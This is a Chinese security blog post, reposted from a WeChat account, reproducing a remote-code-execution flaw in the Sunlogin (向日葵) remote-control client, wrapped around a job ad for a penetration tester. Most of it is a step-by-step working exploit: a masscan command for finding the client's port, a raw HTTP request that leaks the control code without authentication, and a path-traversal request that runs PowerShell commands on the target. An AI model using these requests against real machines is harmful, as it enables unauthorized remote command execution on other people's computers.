向日葵复现

admin 2022年2月17日13:02:22评论137 views字数 1324阅读4分24秒阅读模式

前言:复现很简单,主要是想招个渗透才发的贴子

base:北京朝阳甲方保险公司

要求:本科统招以上

其他:朝10晚7,中午休息两小时,双休,来和查师傅一起做同事 邮箱:[email protected]

薪资范围:P5-P7


这个洞主要只能打内网,在公网服务器很少有装这玩意并开放端口的


1.端口扫描

TCP客户端会开放一个4W口以上的TCP服务端口,我们首先要扫出这个端口

masscan 

masscan -p40000-65534 X.X.9.43/32 --rate=500   

向日葵复现


2验证端口

显示认证失败的端口就是了

向日葵复现

3获取控制码

漏洞也发生在这,未经验证识别码和验证码就把控制码返回出来了

向日葵复现

POST /cgi-bin/rpc HTTP/1.1Host: X.X.9.43:49673Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: CID=wj4WkCRIrb4gT8LoyYNTtvvl3rx7fAQOConnection: closeContent-Length: 19
action=verify-haras

向日葵复现

4.拼接执行命令

把控制码拼接到COOKIE上

Cookie: CID=控制码
GET /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20WHOAMI HTTP/1.1Host: X.X.9.43:49673Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateCookie: CID=SEGfkgNFxtuUcZZbyVNUxkoFZGlMmtk6Accept-Language: zh-CN,zh;q=0.9Connection: close

向日葵复现

这样就复现完毕了


写在最后:招人招人招人,查师傅手把手教学搞安全

原文始发于微信公众号(边界骇客):向日葵复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月17日13:02:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   向日葵复现https://cn-sec.com/archives/789572.html

发表评论

匿名网友 填写信息